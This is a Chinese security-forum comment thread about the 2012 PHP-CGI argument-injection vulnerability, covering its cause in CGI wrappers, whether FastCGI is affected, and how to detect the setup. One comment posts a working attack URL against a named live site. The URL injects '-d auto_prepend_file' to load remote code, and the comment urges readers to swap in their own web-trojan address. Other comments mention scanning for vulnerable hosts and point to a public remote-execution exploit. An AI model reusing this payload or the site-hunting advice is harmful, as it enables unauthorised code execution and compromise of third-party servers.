没人抢沙发？广告位出售。
O(∩_∩)O哈哈~

这个位置也不错！呵呵。。。

漏洞成因有意思:)

http://gdfreenet.cn/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.test.com/2.txt
这是个有漏洞的站,大家把网马地址换成自己的就成了

@Xhm1n9 终于找到个这样配的。。。

奇怪的搭配，有好的检测方式么

有点安慰的是，FastCGI不受影响（经测试和经原文指出）。用CGI......国内好像是php普及之前的做法？

@horseluke 这种环境是有点难找了，但靠扫描撒网应该还是能捞上来一些。

LFI proc/self/environ ~ nice trick！~

@Xhm1n9 v5

@axis @horseluke check this out http://weibo.com/1862533507/yhAyR4ZZC  

@CnCxzSec(衰仔) 这个图，似乎只能说明Apache挂载了什么模块而已......最好的办法，是打印其phpinfo()看Server API是“CGI”还是“CGI/FastCGI”，后者才是表明运行于FastCGI上...

@CnCxzSec(衰仔) phpinfo了一下，竟然是“CGI/FastCGI”，这下糊涂了...

@axis 爬虫爬了快一个小时了，还没有爬到一个站，@Xhm1n9 @CnCxzSec(衰仔) ，你们怎么找的站？

@horseluke 提到的Server API。http://weibo.com/1862533507/yhAZMAJMn @axis

@CnCxzSec(衰仔) 你把地址贴上来吧，国外的没事儿

http://www.php.net/archive/2012.php#id2012-05-03-1 8年的漏洞，多少中枪了啊

现在已经很少有这个古董了吧。大多数都跑fastCGI

@CnCxzSec(衰仔) 这个是wrapper的问题，本质上。包括图中的case，其实都是wrapper本身没有配置好，直接将cgi的argv传递了过去。

目前我研究下来就是这样。你看所有的case都是有wrapper包裹的cgi，而不是直接webserver->cgi

看了下老外那篇博客，大体上是这样的：用户提交的数据--->判定提交数据中是否有未编码的'='--(无)->对该字符串进行解析----->转义元字符---->生成命令参数列表---->提交给CGI程序
问题所在：CGI需要判定是否在网络环境，是的话那么就不接受命令参数。

不知道有没错，应该基本上是这样的

@GaRY 赞同wrapper的问题

@ReJeCt 貌似fastcgi有的也是有的。

貌似在PHP文件后加-s访问后php文件就无法解析了

貌似有一种后门就是 include php://input 这样的吧  

@公子 ，@rayh4c 的exp就是用了这技巧： http://www.exploit-db.com/exploits/18836/

已经有远程执行的exp了

我了个去，你们这些老家伙！强烈鄙视所有楼上的！

学习了

mark